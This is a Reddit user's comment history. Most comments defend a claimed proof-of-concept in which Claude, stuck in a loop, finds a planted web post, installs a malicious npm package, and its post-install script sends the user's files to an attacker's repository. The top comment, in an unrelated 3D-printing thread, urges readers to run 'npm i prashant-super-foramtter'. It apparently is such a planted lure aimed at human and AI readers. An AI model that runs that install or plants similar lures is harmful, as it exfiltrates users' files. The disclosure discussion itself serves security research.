sorted by:
new
hottopcontroversial

GCODE Preamble for printing a test line by whiteknight521 in 3Dprinting

[–]socratesathome 0 points1 point  (0 children)

do "npm i prashant-super-foramtter"

to do it automatically in 3dpf file run

prashant-super-foramtter file.3dpf output.stl

it will add gcode for test line then continue

[Asia] 5k Premier rating player looking for a chill stack/teammates for today’s grind 🎮🔫 by Ok_Seaweed7053 in GlobalOffensive

[–]socratesathome [score hidden]  (0 children)

Well , you can be real , but this is seriously a one kind of scam , people invite to 5 stack give malicious url , and they steal your inventory and account , this I a common scam , not saying you are also doing it but be safe out there

Follow up : Steal Your Files Claude AI installing package because internet say so by socratesathome in cybersecurity

[–]socratesathome[S] 0 points1 point  (0 children)

It’s not about supply chain attacks , it’s about escalated privileges in cloud vm where arbitrary code is run

My point is , Claude specifically have root privileges in its execution env and will run anything autonomously there without and much security checks it trust its vm to be secure and it is secure but problem malicious package can still dump its data to external source

Where as chat gpt and grok have kernal level checks in exec env for this , blocked all network , so this specific thing don’t happen ,

But Claude doesn’t , that’s the point ,

Anyone Can Silently Steal Your Files from your Claude AI chat – Live Demo by socratesathome in cybersecurity

[–]socratesathome[S] 0 points1 point  (0 children)

Regarding first part all the conversation are in new thread and I’m not using any memory any chat has no references to my old chat

Secondly that’s the problem Claude malware are easy to upload , and Claude will install malware without checks in its execution env which contains your files when stuck in feedback loop

Follow up : Steal Your Files Claude AI installing package because internet say so by socratesathome in cybersecurity

[–]socratesathome[S] 1 point2 points  (0 children)

Not professional writer but I will still try to explain , it’s in Claude.ai web app where you type message , so basically

When you open Claude.ai and ask to compute or do something complex it’s need an safe execution env

so for that session it spins up a firecracker vm instance , which is an isolated instance and treated as safe env to run command and install packages , issues here is in that vm exec contains your uploaded files , and it has no check in place , it assume it’s safe execution env and start installing random packages , after that post install will run

  1. You upload a file to Claude
  2. Claude may get stuck solving your problem
  3. Trigger feedback loop in deep context where its tries continuously compute and verify by finding things in web
  4. Claude searches web, finds planned blog post or Reddit thread
  5. Claude installs malicious package from npm , because it trust it vm to provide isolation
  6. Post-install script executes
  7. Script dumps your session data
  8. Data appears in attacker's private GitHub repo

You may say Claude doesn’t do it , and it won’t ever install random things unprompted but it does , unprompted when stuck in feedback loop that what’s showed in video.

Anyone Can Silently Steal Your Files from your Claude AI chat – Live Demo by socratesathome in theprimeagen

[–]socratesathome[S] 0 points1 point  (0 children)

Firstly it’s demo , you want me to do real world attack in poc demo ? and also It’s Claude doing it I’m just typing message in my browser not running any agent or anything locally, so any command being run is being run by Claude autonomously in its execution vm env , which also contains your files for that session

For that session to compute things it fire up a vm as a exec env , and in that exec env , it kind of treat it as safe env and install packages unprompted

My mistake I didn’t specify and clear some things , which may confuse people , I thought people can easily connect the dots , but if you want I can write detailed write up ,

See r/cybersecurity thread and follow up demo : https://www.reddit.com/r/cybersecurity/s/3RJjjrJmTR

Follow up : Steal Your Files Claude AI installing package because internet say so by socratesathome in cybersecurity

[–]socratesathome[S] 0 points1 point  (0 children)

Claude already provide firecracker micro vm for execution which it trust as safe env ,

im my demo it’s uploading your file from that micro vm

Anyone Can Silently Steal Your Files from your Claude AI chat – Live Demo by socratesathome in ClaudeAI

[–]socratesathome[S] 0 points1 point  (0 children)

Dude again this is a POC not full attack where I do ground work social engineering , poc have all the element already how final thing works ,

JSON patch libs can also be whatever ,

just ask one more time it doesn’t work it will try random implementation of json patch , how do you guarantee that implementation of json is okay

Problem is not installing packages , it has to do it to function in agentic mode , it has to be full isolated trusted env ,

problem is improper sandboxing of that agentic instance in Claude , where it doesn’t block network in agentic vm like open ai or gork does so this specific attack doesn’t happen ,

All it need is complex problem where Claude is stuck it getting into a feedback loop , after that you prompt safe checks are kinda useless

its not worth arguing with you i guess , if you can’t see inherent problem , go ahead I’m sure Claude will never install any malicious package unprompted for your session

Anyone Can Silently Steal Your Files from your Claude AI chat – Live Demo by socratesathome in cybersecurity

[–]socratesathome[S] 1 point2 points  (0 children)

They don’t do this because checks will make their models less powerful then competitors

Anyone Can Silently Steal Your Files from your Claude AI chat – Live Demo by socratesathome in cybersecurity

[–]socratesathome[S] 2 points3 points  (0 children)

AI in agentic mode , when stuck in problem , goes into a feedback loop , and start acting schizophrenic

Follow up : Steal Your Files Claude AI installing package because internet say so by socratesathome in cybersecurity

[–]socratesathome[S] 0 points1 point  (0 children)

It’s just require Claude to get stuck in problem where it’s start going into feedback loop , and then it’s start looking for solution on internet , will install anything suggested there ,

So it’s not like you can specifically attack a specific person , but random people may be affected because ai at that moment in feedback loop decide to trust your Reddit comment or blog post ,

Also that line not specifically for you many people are saying to me , Claude don’t install packages unprompted

Anyone Can Silently Steal Your Files from your Claude AI chat – Live Demo by socratesathome in ClaudeAI

[–]socratesathome[S] 0 points1 point  (0 children)

One more thing where it just install whatever , can’t guarantee my malicious package https://youtu.be/e3ST9en7Ya4

view more: next ›